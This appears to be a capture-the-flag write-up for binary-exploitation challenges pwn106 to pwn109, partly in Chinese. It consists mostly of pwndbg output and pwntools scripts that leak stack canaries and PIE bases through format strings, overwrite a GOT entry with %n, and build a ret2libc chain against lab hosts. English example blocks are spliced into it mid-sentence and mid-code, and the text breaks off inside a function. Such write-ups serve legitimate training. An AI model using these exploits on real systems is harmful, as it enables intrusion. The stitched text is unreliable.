0x60\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500[ DISASM \/ x86-64 \/ set emulate on ]\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \u25ba 0x555555555242 &lt;main+4&gt;     sub    rsp, 0x60                    RSP =&gt; 0x7fffffffdce0 (0x7fffffffdd40 - 0x60)\n   0x555555555246 &lt;main+8&gt;     mov    rax, qword ptr fs:[0x28]     RAX, [0x7ffff7dab768] =&gt; 0x8d09028e828a9200\n   0x55555555524f &lt;main+17&gt;    mov    qword ptr [rbp - 8], rax     [0x7fffffffdd38] &lt;= 0x8d09028e828a9200\n   0x555555555253 &lt;main+21&gt;    xor    eax, eax                     EAX =&gt; 0\n   0x555555555255 &lt;main+23&gt;    mov    eax, 0                       EAX =&gt; 0\n   0x55555555525a &lt;main+28&gt;    call   setup                       &lt;setup&gt;\n \n   0x55555555525f &lt;main+33&gt;    mov    eax, 0       EAX =&gt; 0\n   0x555555555264 &lt;main+38&gt;    call   banner                      &lt;banner&gt;\n \n   0x555555555269 &lt;main+43&gt;    movabs rax, 0x5b5858587b4d4854         RAX =&gt; 0x5b5858587b4d4854 ('THM{XXX[')\n   0x555555555273 &lt;main+53&gt;    movabs rdx, 0x6465725f67616c66         RDX =&gt; 0x6465725f67616c66 ('flag_red')\n   0x55555555527d &lt;main+63&gt;    mov    qword ptr [rbp - 0x60], 
rax\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500[ STACK ]\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n00:0000\u2502 rbp rsp 0x7fffffffdd40 \u25c2\u2014 1\n01:0008\u2502+008     0x7fffffffdd48 \u2014\u25b8 0x7ffff7dd7ca8 (__libc_start_call_main+120) \u25c2\u2014 mov edi, eax\n02:0010\u2502+010     0x7fffffffdd50 \u2014\u25b8 0x7fffffffde40 \u2014\u25b8 0x7fffffffde48 \u25c2\u2014 0x38 \/* '8' *\/\n03:0018\u2502+018     0x7fffffffdd58 \u2014\u25b8 0x55555555523e (main) \u25c2\u2014 push rbp\n04:0020\u2502+020     0x7fffffffdd60 \u25c2\u2014 0x155554040\n05:0028\u2502+028     0x7fffffffdd68 \u2014\u25b8 0x7fffffffde58 \u2014\u25b8 0x7fffffffe1c6 \u25c2\u2014 '\/home\/kali\/pwn\/pwn106-user-1644300441063.pwn106-user'\n06:0030\u2502+030     0x7fffffffdd70 \u2014\u25b8 0x7fffffffde58 \u2014\u25b8 0x7fffffffe1c6 \u25c2\u2014 '\/home\/kali\/pwn\/pwn106-user-1644300441063.pwn106-user'\n07:0038\u2502+038     0x7fffffffdd78 \u25c2\u2014 0xd23b59c484279e34\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500[ BACKTRACE 
]\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \u25ba 0   0x555555555242 main+4\n   1   0x7ffff7dd7ca8 __libc_start_call_main+120\n   2   0x7ffff7dd7d65 __libc_start_main+133\n   3   0x5555555550ba _start+42\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\npwndbg&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\n\nr=remote('10.10.125.41',9006)\n#r=process('\/mnt\/d\/Users\/cheng\/Downloads\/pwn106-user-1644300441063.pwn106-user')\nr.recvlines(7)\n\nr.sendline(b\"%6$p,%7$p,%8$p,%9$p,%10$p,%11$p,%12$p\")\n\nr.recvline()\nresponse = r.recvline().decode().strip().replace('Thanks ', '').replace('0x','').split(',')\n\nfor i in range(7):\n    print(bytes.fromhex(response[i]).decode()[::-1],end='')\nprint()\nr.close()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 107 &#8211; Bypassing 
mitigations<\/h2>\n\n\n\n<p>\u9019\u984c\u4fdd\u8b77\u5168\u958b\uff0c\u4e00\u6a23\u6709 fmt &amp; bof \u4e14\u6709\u7d66\u53ef\u4ee5 RCE \u7684 function \u4f46\u9700\u8981 leak canary &amp; pie base<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; disassemble main\nDump of assembler code for function main:\n   0x0000000000000992 &lt;+0&gt;:     push   rbp\n   0x0000000000000993 &lt;+1&gt;:     mov    rbp,rsp\n   0x0000000000000996 &lt;+4&gt;:     sub    rsp,0x40\n   0x000000000000099a &lt;+8&gt;:     mov    rax,QWORD PTR fs:0x28\n   0x00000000000009a3 &lt;+17&gt;:    mov    QWORD PTR [rbp-0x8],rax\n   0x00000000000009a7 &lt;+21&gt;:    xor    eax,eax\n   0x00000000000009a9 &lt;+23&gt;:    mov    eax,0x0\n   0x00000000000009ae &lt;+28&gt;:    call   0x88a &lt;setup&gt;\n   0x00000000000009b3 &lt;+33&gt;:    mov    eax,0x0\n   0x00000000000009b8 &lt;+38&gt;:    call   0x912 &lt;banner&gt;\n   0x00000000000009bd &lt;+43&gt;:    lea    rdi,[rip+0x2a4]        # 0xc68\n   0x00000000000009c4 &lt;+50&gt;:    call   0x710 &lt;puts@plt&gt;\n   0x00000000000009c9 &lt;+55&gt;:    lea    rdi,[rip+0x2b8]        # 0xc88\n   0x00000000000009d0 &lt;+62&gt;:    call   0x710 &lt;puts@plt&gt;\n   0x00000000000009d5 &lt;+67&gt;:    lea    rdi,[rip+0x2d4]        # 0xcb0\n   0x00000000000009dc &lt;+74&gt;:    call   0x710 &lt;puts@plt&gt;\n   0x00000000000009e1 &lt;+79&gt;:    lea    rdi,[rip+0x318]        # 0xd00\n   0x00000000000009e8 &lt;+86&gt;:    call   0x710 &lt;puts@plt&gt;\n   0x00000000000009ed &lt;+91&gt;:    lea    rdi,[rip+0x344]        # 0xd38\n   0x00000000000009f4 &lt;+98&gt;:    mov    eax,0x0\n   0x00000000000009f9 &lt;+103&gt;:   call   0x740 &lt;printf@plt&gt;\n   0x00000000000009fe &lt;+108&gt;:   lea    rax,[rbp-0x40]\n   0x0000000000000a02 &lt;+112&gt;:   mov    edx,0x14\n   0x0000000000000a07 &lt;+117&gt;:   mov    rsi,rax\n   0x0000000000000a0a &lt;+120&gt;:   mov    edi,0x0\n   0x0000000000000a0f &lt;+125&gt;:   
mov    eax,0x0\n   0x0000000000000a14 &lt;+130&gt;:   call   0x750 &lt;read@plt&gt;\n   0x0000000000000a19 &lt;+135&gt;:   lea    rdi,[rip+0x338]        # 0xd58\n   0x0000000000000a20 &lt;+142&gt;:   mov    eax,0x0\n   0x0000000000000a25 &lt;+147&gt;:   call   0x740 &lt;printf@plt&gt;\n   0x0000000000000a2a &lt;+152&gt;:   lea    rax,[rbp-0x40]\n   0x0000000000000a2e &lt;+156&gt;:   mov    rdi,rax\n   0x0000000000000a31 &lt;+159&gt;:   mov    eax,0x0\n   0x0000000000000a36 &lt;+164&gt;:   call   0x740 &lt;printf@plt&gt;\n   0x0000000000000a3b &lt;+169&gt;:   lea    rdi,[rip+0x346]        # 0xd88\n   0x0000000000000a42 &lt;+176&gt;:   call   0x710 &lt;puts@plt&gt;\n   0x0000000000000a47 &lt;+181&gt;:   lea    rdi,[rip+0x36a]        # 0xdb8\n   0x0000000000000a4e &lt;+188&gt;:   call   0x710 &lt;puts@plt&gt;\n   0x0000000000000a53 &lt;+193&gt;:   lea    rax,[rbp-0x20]\n   0x0000000000000a57 &lt;+197&gt;:   mov    edx,0x200\n   0x0000000000000a5c &lt;+202&gt;:   mov    rsi,rax\n   0x0000000000000a5f &lt;+205&gt;:   mov    edi,0x0\n   0x0000000000000a64 &lt;+210&gt;:   mov    eax,0x0\n   0x0000000000000a69 &lt;+215&gt;:   call   0x750 &lt;read@plt&gt;\n   0x0000000000000a6e &lt;+220&gt;:   nop\n   0x0000000000000a6f &lt;+221&gt;:   mov    rax,QWORD PTR [rbp-0x8]\n   0x0000000000000a73 &lt;+225&gt;:   xor    rax,QWORD PTR fs:0x28\n   0x0000000000000a7c &lt;+234&gt;:   je     0xa83 &lt;main+241&gt;\n   0x0000000000000a7e &lt;+236&gt;:   call   0x720 &lt;__stack_chk_fail@plt&gt;\n   0x0000000000000a83 &lt;+241&gt;:   leave\n   0x0000000000000a84 &lt;+242&gt;:   ret<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<p><strong>fuzzing<\/strong> <\/p>\n\n\n\n<p>The canary is recognisable because its lowest byte is always 00; in the %N$p dump it turns up at argument 13. Next look for a value whose low bytes end in 992 (main's static offset, see the pwndbg output further down): locally it is argument 17, but on the remote target it is 19, so the fuzzer has to be re-run against the real target rather than trusting the local indexes.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code 
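<p>The selection and arithmetic just described, automated: pick the canary and the pointer into main out of a %N$p dump, derive the PIE base, and lay out the second-read payload (24 bytes, canary, saved rbp, target). This is an added example in plain Python (struct only, no pwntools), not the page's exploit; the fuzz output below is constructed in the format the page's fuzzer prints, and the offsets 0x992 and 0x94d (get_streak+1) are the page's.<\/p>

```python
import struct

MAIN_OFFSET = 0x992      # static address of main (pwndbg: p main -> 0x555555400992, base 0x555555400000)
SHELL_OFFSET = 0x94D     # get_streak+1, the target the page returns into
# Frame of main() from the disassembly: the second read() fills rbp-0x20, the canary sits at
# rbp-0x8, then the saved rbp and the return address follow.
BUF_TO_CANARY = 0x20 - 0x8
FIRST_READ_MAX, SECOND_READ_MAX = 0x14, 0x200


def parse_fuzz(lines):
    """Turn the fuzzer's 'N: 0x...' lines into {N: value}; '(nil)' and non-hex entries are dropped."""
    slots = {}
    for line in lines:
        idx, _, val = line.partition(':')
        val = val.strip()
        if val.startswith('0x'):
            slots[int(idx)] = int(val, 16)
    return slots


def find_canary(slots):
    """glibc's x86-64 canary has a zero low byte and random high bits, so it is the slot that
    ends in 00 but is not a user-space pointer (user pointers have bits 47..63 clear)."""
    for idx, value in sorted(slots.items()):
        if value & 0xFF == 0 and value >> 47 != 0:
            return idx, value
    raise ValueError('no canary-looking slot in the dump')


def find_text_pointer(slots, static_addr=MAIN_OFFSET):
    """PIE only shifts the image by whole pages, so a pointer into main keeps its low 12 bits."""
    for idx, value in sorted(slots.items()):
        if value >> 47 == 0 and value & 0xFFF == static_addr & 0xFFF:
            return idx, value
    raise ValueError('no slot ending in %#x' % (static_addr & 0xFFF))


def pie_base(main_runtime):
    base = main_runtime - MAIN_OFFSET
    if base & 0xFFF:
        raise ValueError('PIE base %#x is not page aligned, wrong slot?' % base)
    return base


def build_payload(canary, base):
    """Filler up to the canary, the canary written back unchanged (else __stack_chk_fail),
    8 bytes over the saved rbp, then the target in the return slot; must fit the 0x200 read."""
    payload = (b'a' * BUF_TO_CANARY + struct.pack('<Q', canary)
               + b'b' * 8 + struct.pack('<Q', base + SHELL_OFFSET))
    assert len(payload) <= SECOND_READ_MAX
    return payload


# Constructed fuzzer output in the format the page's fuzzer prints (not a real capture).
SAMPLE_FUZZ = """6: 0x7ffe3d9b1c40
7: (nil)
8: 0x7f3a1c2d3e4f
13: 0x8a3f2c1e5d7b4a00
17: 0x7f3a1c5e7ca8
19: 0x55d0c2a3f992""".splitlines()


def plan(lines=SAMPLE_FUZZ):
    """Return the leak format for the first read and the overflow payload for the second."""
    slots = parse_fuzz(lines)
    canary_idx, canary = find_canary(slots)
    main_idx, main_runtime = find_text_pointer(slots)
    leak_fmt = '%%%d$p,%%%d$p' % (canary_idx, main_idx)
    assert len(leak_fmt) < FIRST_READ_MAX          # the first read() only accepts 0x14 bytes
    base = pie_base(main_runtime)
    return leak_fmt, canary, base, build_payload(canary, base)
```

<p>plan() on the constructed dump yields the format string %13$p,%19$p and a 48-byte payload with the canary at offset 24 and 0x55d0c2a3f94d at offset 40; the alignment check in pie_base() is what catches picking a wrong slot.<\/p>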
lang=\"python\" class=\"language-python\">from pwn import *\nfor i in range(6, 25):\n    #p = process('.\/pwn107-1644307530397.pwn107')\n    p=remote('10.48.178.31',9007)\n    p.sendlineafter(b\"streak? \", f\"%{i}$p\".encode())\n    p.recvuntil(b\"current streak: \")\n    print(f\"{i}: {p.recvline().strip().decode()}\")\n    p.close()<\/code><\/pre>\n\n\n\n<p><strong>exploit<\/strong><\/p>\n\n\n\n<p>\u7528 main \u7684\u4f4d\u7f6e\u53bb\u627e\uff0c\u6c42\u5f97 PIE base = runtime address &#8211; static offset ; \u4ee5\u53ca\u53d6\u5f97\u53ef\u4ee5 RCE function \u7684\u4f4d\u7f6e<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; p main\n$1 = {&lt;text variable, no debug info&gt;} 0x555555400992 &lt;main&gt;\npwndbg&gt; p get_streak\n$2 = {&lt;text variable, no debug info&gt;} 0x55555540094c &lt;get_streak&gt;<\/code><\/pre>\n\n\n\n<p>\u5728\u7b2c\u4e8c\u6b21 read \u6642\uff0c\u539f\u8b8a\u6578\u5927\u5c0f\u662f 24 \u4f46\u662f\u53ef\u4ee5 read 0x200 \u5229\u7528\u6b64\u8655 overflow \uff0c\u518d\u52a0\u4e0a leak canary &amp; 8 bytes padding \u84cb\u904e rbp \uff0c\u63a5\u8457\u5728 ret \u7684\u5730\u65b9\u586b\u5165 RCE function <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\n\nio=remote('10.48.176.242',9007)\n#io=process('.\/pwn107-1644307530397.pwn107')\nio.recvlines(10)\nio.sendline(b'%13$p,%19$p')\nshell_offset=0x94d\nmain_offset=0x992\nio.recvline()\nio.recvuntil(b'Your current streak: ')\n\nleak = io.recvline().decode().strip().split(',')\ncanary = int(leak[0], 16)\nleakedpie = int(leak[1], 16)\n\nlog.success(f'canary {hex(canary)} , pie base {hex(leakedpie-main_offset)}')\ntarget=leakedpie-main_offset+shell_offset\nio.sendline(b'a'*24+p64(canary)+b'a'*8+p64(target))\n\nio.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 108 &#8211; GOT overwrite<\/h2>\n\n\n\n<p>Partial RELRO &amp; No PIE \u4e14\u6709 RCE function 
holidays. Looking at the program, the second input is passed straight to printf(format), so it is a format string bug. Partial RELRO leaves the GOT writable and no PIE makes its address fixed, so the plan is: put the address of the puts GOT entry into the first input (the name buffer, which sits on the stack where printf reads its arguments), then use the format string in the second input to write holidays' address over that GOT entry. The next call to puts() then jumps to holidays.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  char buf[32]; \/\/ [rsp+0h] [rbp-90h] BYREF\n  char format[104]; \/\/ [rsp+20h] [rbp-70h] BYREF\n  unsigned __int64 v7; \/\/ [rsp+88h] [rbp-8h]\n\n  v7 = __readfsqword(0x28u);\n  setup(argc, argv, envp);\n  banner();\n  puts(aThmUniversity);\n  puts(&amp;byte_402198);\n  printf(\"\\n=[Your name]: \");\n  read(0, buf, 0x12u);      \/\/ 18 bytes: room for two 8-byte pointers\n  printf(\"=[Your Reg No]: \");\n  read(0, format, 0x64u);\n  puts(\"\\n=[ STUDENT PROFILE ]=\");\n  printf(\"Name         : %s\", buf);\n  printf(\"Register no  : \");\n  printf(format);           \/\/ user-controlled format string\n  printf(\"Institue     : THM\");\n  puts(\"\\nBranch       : B.E (Binary Exploitation)\\n\");   \/\/ first puts() after the overwrite\n  puts(\n    \"\\n\"\n    \"                    =[ EXAM SCHEDULE ]=                  \\n\"\n    \" --------------------------------------------------------\\n\"\n    \"|  Date     |           Exam               |    FN\/AN    |\\n\"\n    \"|--------------------------------------------------------\\n\"\n    \"| 1\/2\/2022  |  PROGRAMMING IN ASSEMBLY     |     FN      |\\n\"\n    \"|--------------------------------------------------------\\n\"\n    \"| 3\/2\/2022  |  DATA STRUCTURES             |     FN      |\\n\"\n    \"|--------------------------------------------------------\\n\"\n    \"| 3\/2\/2022  |  RETURN ORIENTED PROGRAMMING |     AN      |\\n\"\n    \"|--------------------------------------------------------\\n\"\n    \"| 7\/2\/2022  |  SCRIPTING WITH PYTHON       |     FN      |\\n\"\n    \" --------------------------------------------------------\");\n  return v7 - 
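<p>To check a GOT-overwrite format string before sending it, the following added example models the part of glibc printf that a %n exploit relies on (the running character count, %Nc padding, and %K$n-family stores through a pointer read from stack slot K) and runs two payloads against a constructed GOT: the page's one-shot %&lt;holidays&gt;c%6$lln with the pointer in the name buffer, and a fmtstr_payload-style three-write version that embeds the pointers in the format string itself. This is not the page's code and not glibc; the stack layout (name at argument 6, format at argument 10) and the addresses 0x404018 and 0x40123b are the page's, the libc pointer initially in the GOT is made up.<\/p>

```python
import re
import struct

# Fixed addresses from the page (No PIE): the puts GOT entry and the holidays() function.
PUTS_GOT = 0x404018
HOLIDAYS = 0x40123B
# Layout from the decompiled main(): buf (32 bytes) is the first stack-passed printf
# argument (%6$), the 104-byte format buffer starts four slots later (%10$).
NAME_ARG, FMT_ARG = 6, 10
NAME_SIZE, FMT_SIZE = 32, 104
# Constructed GOT snapshot: puts was already called, so its entry holds a (made-up) libc pointer.
GOT_BASE = 0x404000
FAKE_PUTS_LIBC = 0x00007F1234567890

_SPEC = re.compile(r'%(?:(\d*)c|(\d+)\$(hhn|hn|lln|ln|n))')
_SIZES = {'hhn': 1, 'hn': 2, 'n': 4, 'ln': 8, 'lln': 8}


def simulate_printf(fmt: bytes, stack: bytes, mem: bytearray, mem_base: int = GOT_BASE) -> int:
    """Model of printf for %Nc and the %K$n family. `stack` starts at argument 6 (the first
    stack-passed argument on x86-64 SysV); `mem` is the writable window at `mem_base`.
    Returns the number of characters printf would have emitted."""
    text = fmt.split(b'\0')[0].decode('latin-1')   # printf stops at the first NUL
    count = pos = 0
    for m in _SPEC.finditer(text):
        count += m.start() - pos                    # literal bytes before this conversion
        pos = m.end()
        if m.group(2) is None:                      # %Nc prints max(N, 1) characters
            count += max(int(m.group(1) or '1'), 1)
            continue
        size = _SIZES[m.group(3)]
        ptr = struct.unpack_from('<Q', stack, (int(m.group(2)) - NAME_ARG) * 8)[0]
        off = ptr - mem_base
        if not 0 <= off <= len(mem) - size:
            raise ValueError('write outside modelled memory: %#x' % ptr)
        mem[off:off + size] = (count & ((1 << 8 * size) - 1)).to_bytes(size, 'little')
    return count + len(text) - pos


def build_short_writes(writes: dict, fmt_arg: int = FMT_ARG) -> bytes:
    """fmtstr_payload-style: one %Nc%K$hn pair per 16-bit write, in increasing value order so
    the count never wraps, with the target pointers appended after the specifiers (pointers
    contain NUL bytes, so they must come last). Argument indexes depend on the specifier
    length, hence the fixed-point loop."""
    items = sorted(writes.items(), key=lambda kv: kv[1])
    spec_len = 0
    for _ in range(8):
        count, spec = 0, b''
        ptr_arg = fmt_arg + (spec_len + 7) // 8
        for i, (_, val) in enumerate(items):
            pad = (val - count) % 0x10000
            spec += b'%c' if pad == 1 else (b'%%%dc' % pad if pad else b'')
            count += pad
            spec += b'%%%d$hn' % (ptr_arg + i)
        if len(spec) == spec_len:
            break
        spec_len = len(spec)
    spec = spec.ljust(-(-len(spec) // 8) * 8, b'A')
    return spec + b''.join(struct.pack('<Q', a) for a, _ in items)


def run_exploit(name: bytes, fmt: bytes):
    """Feed both inputs through the model; return (puts GOT entry afterwards, chars printed)."""
    got = bytearray(0x40)
    struct.pack_into('<Q', got, PUTS_GOT - GOT_BASE, FAKE_PUTS_LIBC)
    stack = name.ljust(NAME_SIZE, b'\0') + fmt.ljust(FMT_SIZE, b'\0')
    printed = simulate_printf(fmt, stack, got)
    return struct.unpack_from('<Q', got, PUTS_GOT - GOT_BASE)[0], printed


def page_payload():
    """The page's version: pointer in the name, %<holidays>c%6$lln in the format."""
    return struct.pack('<Q', PUTS_GOT), b'%%%dc%%%d$lln' % (HOLIDAYS, NAME_ARG)


def split_payload():
    """Three 2-byte writes: both halves of HOLIDAYS plus a zero over bytes 4..5, because the
    resolved libc pointer already in the GOT has non-zero bytes there."""
    writes = {PUTS_GOT: HOLIDAYS & 0xFFFF, PUTS_GOT + 2: (HOLIDAYS >> 16) & 0xFFFF, PUTS_GOT + 4: 0}
    return b'a', build_short_writes(writes)
```

<p>Both payloads leave 0x40123b in the GOT entry, but the page's version prints 4198971 characters while the split version prints under 5000 and still fits in the 0x64 bytes the second read() accepts. The zero write has to come first (count 0) and the pointer for bytes 4..5 is needed because a 4-byte write would leave 0x7f.. in the upper half of the resolved pointer.<\/p>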
__readfsqword(0x28u);\n}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Payload<\/h3>\n\n\n\n<p><strong>fuzzing<\/strong> <\/p>\n\n\n\n<p>Fuzzing result: buf is the first stack-passed argument, so %6$p returns the eight b's of the first input (0x6262626262626262); the format buffer itself starts four slots later, so %10$p returns the leading aaaaaaaa of the second input (0x6161616161616161). Argument 6 is therefore where a pointer placed in the name ends up, and 10 is the offset fmtstr_payload needs.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\nfor i in range(6,25):\n    io=process('.\/pwn108-1644300489260.pwn108')\n    io.sendlineafter(b':',b'bbbbbbbb')\n    io.sendlineafter(b':',f'aaaaaaaa%{i}$p'.encode())\n    io.recvlines(3)\n    log.info(f\"{i} {io.recvline().split()[3]}\")\n    io.close()<\/code><\/pre>\n\n\n\n<p><strong>exploit<\/strong><\/p>\n\n\n\n<p>Find the puts GOT entry (0x404018) and holidays (0x40123b) in pwndbg; with no PIE both are fixed. %&lt;holidays&gt;c makes printf pad its output until the character count equals holidays' address, and %6$lln then stores that count as an 8-byte value at the address held in argument 6, i.e. the puts GOT entry supplied through the first input. The next puts() call therefore lands in holidays. The decimal width 4198971 means about 4 MB of padding go through the socket; it works, but splitting the write into 2-byte %hn writes brings the padding down to a few thousand characters.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import *\n\n#io=process('.\/pwn108-1644300489260.pwn108')\nio=remote('10.49.168.146',9008)\nputs_got=0x404018\nholidays=0x0040123b\n\n# first input: the pointer printf will dereference as argument 6\nio.sendlineafter(b':',p64(puts_got))\n# print <holidays> characters, then store the count as 8 bytes at that pointer\nio.sendlineafter(b'No]:',b'%'+str(holidays).encode()+b'c%6$lln')\nio.interactive()<\/code><\/pre>\n\n\n\n<p><strong>script kiddie version <\/strong><\/p>\n\n\n\n<p>Let pwntools' fmtstr_payload rewrite the puts GOT entry to holidays directly; 10 is the argument index of the format buffer found by fuzzing, and the generated payload must fit in the 0x64 bytes the second read() accepts.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">from pwn import 
*\ncontext.arch='amd64'\nio=process('.\/pwn108-1644300489260.pwn108')\nelf=ELF('.\/pwn108-1644300489260.pwn108')\n#io=remote('10.49.168.146',9008)\nputs_got=elf.got['puts']\nholidays=elf.symbols['holidays']\nio.sendlineafter(b':',b'a')\npayload=fmtstr_payload(10,{puts_got:holidays})  # 10 = argument index of the format buffer\nio.sendlineafter(b'No]:',payload)\nio.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn 109 &#8211; Return to PLT<\/h2>\n\n\n\n<p>Partial RELRO, no canary, no PIE, and gets() gives an unbounded overflow of the 0x20-byte buffer at rbp-0x20 (40 bytes to the return address).<\/p>\n\n\n\n<p>stage 1: pop the address of a GOT entry into rdi and return into puts@plt, so puts prints the libc address stored in that entry. Do this three times for puts, gets and setvbuf, then return into main to get a second gets(). With three leaked addresses https:\/\/libc.rip\/ identifies which libc build the remote binary runs (a single address usually matches several builds, three narrow it down).<\/p>\n\n\n\n<p>stage 2: with the libc identified it is plain ret2libc: libc base = leaked puts address &#8211; puts' offset inside that libc (the symbol offset, not the GOT address); overflow again and chain pop rdi with the \/bin\/sh string from libc into system. The lone ret gadget in front of the chain keeps the stack 16-byte aligned at the call into system().<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">pwndbg&gt; disassemble main\nDump of assembler code for function main:\n   0x00000000004011f2 &lt;+0&gt;:     endbr64\n   0x00000000004011f6 &lt;+4&gt;:     push   rbp\n   0x00000000004011f7 &lt;+5&gt;:     mov    rbp,rsp\n=&gt; 0x00000000004011fa &lt;+8&gt;:     sub    rsp,0x20\n   0x00000000004011fe &lt;+12&gt;:    mov    eax,0x0\n   0x0000000000401203 &lt;+17&gt;:    call   0x401176 &lt;setup&gt;\n   0x0000000000401208 &lt;+22&gt;:    mov    eax,0x0\n   0x000000000040120d &lt;+27&gt;:    call   0x4011db &lt;banner&gt;\n   0x0000000000401212 &lt;+32&gt;:    lea    rdi,[rip+0xf07]        # 0x402120\n   0x0000000000401219 &lt;+39&gt;:    call   0x401060 &lt;puts@plt&gt;\n   0x000000000040121e &lt;+44&gt;:    lea    rax,[rbp-0x20]\n   0x0000000000401222 &lt;+48&gt;:    mov    rdi,rax\n   0x0000000000401225 
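<p>Stage 1 and stage 2 as described above, with the checks worth having before the second overflow: parse the three puts() leaks correctly (each pointer arrives as 6 bytes followed by a newline, so three back-to-back recv(6) calls desynchronise after the first), confirm the libc base is page aligned, and confirm the gets and setvbuf leaks land on their symbols in the chosen libc, which is the test that the libc.rip match is the right build. This is an added example in plain Python (struct only), not the page's script; the gadget and GOT addresses are the page's, the libc symbol offsets and the leaked base are constructed placeholders to be replaced by ELF(...).symbols of the matched libc.<\/p>

```python
import struct


def p64(v):
    return struct.pack('<Q', v)


# Binary-side constants from the page (No PIE, so they are fixed).
POP_RDI_RET, RET, PUTS_PLT, MAIN = 0x4012A3, 0x40101A, 0x401060, 0x4011F2
PUTS_GOT, GETS_GOT, SETVBUF_GOT = 0x404018, 0x404020, 0x404028
OFFSET = 40   # 0x20 buffer + 8 bytes of saved rbp

# Placeholder symbol offsets (constructed for this example); in practice take them from
# ELF('<libc matched on libc.rip>').symbols and next(libc.search(b'/bin/sh')).
LIBC_SYMS = {'puts': 0x84420, 'gets': 0x86AF0, 'setvbuf': 0x88550, 'system': 0x52290, 'bin_sh': 0x1B45BD}


def stage1_chain():
    """pop rdi <- GOT entry ; puts@plt, three times, then return into main for a second gets()."""
    chain = b'a' * OFFSET
    for got in (PUTS_GOT, GETS_GOT, SETVBUF_GOT):
        chain += p64(POP_RDI_RET) + p64(got) + p64(PUTS_PLT)
    return chain + p64(MAIN)


def naive_leaks(stream, n=3):
    """What recv(6) three times in a row yields: only the first value is a real pointer."""
    return [struct.unpack('<Q', stream[i * 6:i * 6 + 6].ljust(8, b'\0'))[0] for i in range(n)]


def read_leaks(stream, n=3):
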